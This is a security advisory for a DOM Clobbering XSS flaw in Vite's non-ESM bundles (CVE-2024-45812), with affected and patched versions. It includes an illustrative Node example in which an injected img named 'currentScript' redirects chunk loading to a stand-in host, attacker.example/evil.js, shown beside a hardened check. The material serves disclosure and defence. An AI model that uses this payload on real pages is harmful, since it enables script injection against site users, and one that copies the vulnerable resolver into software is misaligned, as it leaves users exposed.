Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS
- Severity: Medium
Description
We discovered a DOM Clobbering vulnerability in Vite when building scripts to the cjs/iife/umd output formats. The DOM Clobbering gadget in the bundled module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.
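The following is an added example, not Vite's source or the advisory's own code, showing the mechanism the description refers to. It assumes the gadget pattern common to non-ESM bundles: a helper that resolves the bundle's own URL through `document.currentScript.src` and then uses it as the base for loading further chunks. Browsers expose `img`, `form`, `iframe`, `embed` and `object` elements carrying a `name` attribute as named properties of `document`, and those named properties shadow built-in ones, so an injected `<img name="currentScript" src="https://attacker.example/evil.js">` is enough to redirect such a helper. Node has no DOM, so `makeDocument` is a constructed stand-in that reproduces only that named-property lookup; the URLs and element list are constructed sample input.

```javascript
// Added example (not Vite's source): a DOM Clobbering gadget of the kind the
// advisory describes, beside the check that defuses it.
//
// Node has no DOM, so `makeDocument` is a minimal stand-in that reproduces just
// the named-property lookup on `document`. All inputs are constructed.

function makeDocument({ baseURI, ownScriptSrc, injectedElements = [] }) {
  // The script that is genuinely executing, as the browser would report it.
  const ownScript = { tagName: 'SCRIPT', src: ownScriptSrc };
  const doc = { baseURI };
  Object.defineProperty(doc, 'currentScript', {
    get() {
      // Simplified clobbering rule: an attacker-supplied element whose `name`
      // matches the property name wins over the built-in value.
      const clobber = injectedElements.find((el) => el.name === 'currentScript');
      return clobber !== undefined ? clobber : ownScript;
    },
  });
  return doc;
}

// Gadget (vulnerable): trusts whatever `document.currentScript` resolves to.
function resolveScriptUrlVulnerable(doc, fallbackFile = 'bundle.js') {
  return (doc.currentScript && doc.currentScript.src) ||
    new URL(fallbackFile, doc.baseURI).href;
}

// Hardened: only accept `src` from a genuine <script> element; anything else
// (an <img>, a <form>, ...) is ignored and the base-URI fallback is used.
function resolveScriptUrlHardened(doc, fallbackFile = 'bundle.js') {
  const s = doc.currentScript;
  const isScript = Boolean(s) && typeof s.tagName === 'string' &&
    s.tagName.toUpperCase() === 'SCRIPT';
  return (isScript && s.src) || new URL(fallbackFile, doc.baseURI).href;
}

// Why the resolved URL matters: bundles use it as the base for lazy chunks,
// workers and similar. Whoever controls the base controls the script that is
// fetched and executed next, i.e. XSS without injecting a <script> tag.
function chunkUrl(doc, resolver, chunk = './chunk-abc123.js') {
  return new URL(chunk, resolver(doc)).href;
}

// Runs both resolvers against a clean page and a page carrying the attacker's
// scriptless <img>, returning the chunk URL each would load.
function runDemo() {
  const base = {
    baseURI: 'https://app.example/assets/',
    ownScriptSrc: 'https://app.example/assets/bundle.js',
  };
  const cleanPage = makeDocument(base);
  const attackedPage = makeDocument({
    ...base,
    // Equivalent of <img name="currentScript" src="https://attacker.example/evil.js">
    // reaching the page through an unsanitized `name` attribute (constructed).
    injectedElements: [
      { tagName: 'IMG', name: 'currentScript', src: 'https://attacker.example/evil.js' },
    ],
  });
  return {
    clean: {
      vulnerable: chunkUrl(cleanPage, resolveScriptUrlVulnerable),
      hardened: chunkUrl(cleanPage, resolveScriptUrlHardened),
    },
    attacked: {
      vulnerable: chunkUrl(attackedPage, resolveScriptUrlVulnerable),
      hardened: chunkUrl(attackedPage, resolveScriptUrlHardened),
    },
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(runDemo(), null, 2));
}
```

Running the file prints the four URLs: on the clean page both resolvers load the chunk from `https://app.example/assets/`, while on the attacked page the vulnerable resolver loads it from `https://attacker.example/` and the hardened one still loads it from the application origin. The tagName check is the kind of validation that closes this class of gadget; when reviewing other bundled helpers, treat every property read off `document` by name as a clobbering candidate.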
Recommendation
Update the vite package to a patched version for the release line you are on. Version details:
- Affected version(s): **< 3.2.11; >= 4.0.0, < 4.5.4; >= 5.0.0, < 5.1.8; >= 5.2.0, < 5.2.14; >= 5.3.0, < 5.3.6; >= 5.4.0, < 5.4.6**
- Patched version(s): **3.2.11, 4.5.4, 5.1.8, 5.2.14, 5.3.6, 5.4.6**
References
- GHSA-64vr-g452-qvp3
- research.securitum.com
- scnps.co
- CVE-2024-45812
- CWE-79
- CAPEC-310
- OWASP 2021-A3
- OWASP 2021-A6
Related Issues
- Vite middleware may serve files starting with the same name with the public directory - CVE-2025-58751
- Vite's server.fs.deny bypassed with /. for files under project root - CVE-2025-46565
- Vite allows server.fs.deny to be bypassed with .svg or relative paths - CVE-2025-31486
- @sveltejs/kit vulnerable to Cross-site Scripting via tracked search_params - CVE-2025-32388
- Tags: npm, vite
Last updated on September 19, 2024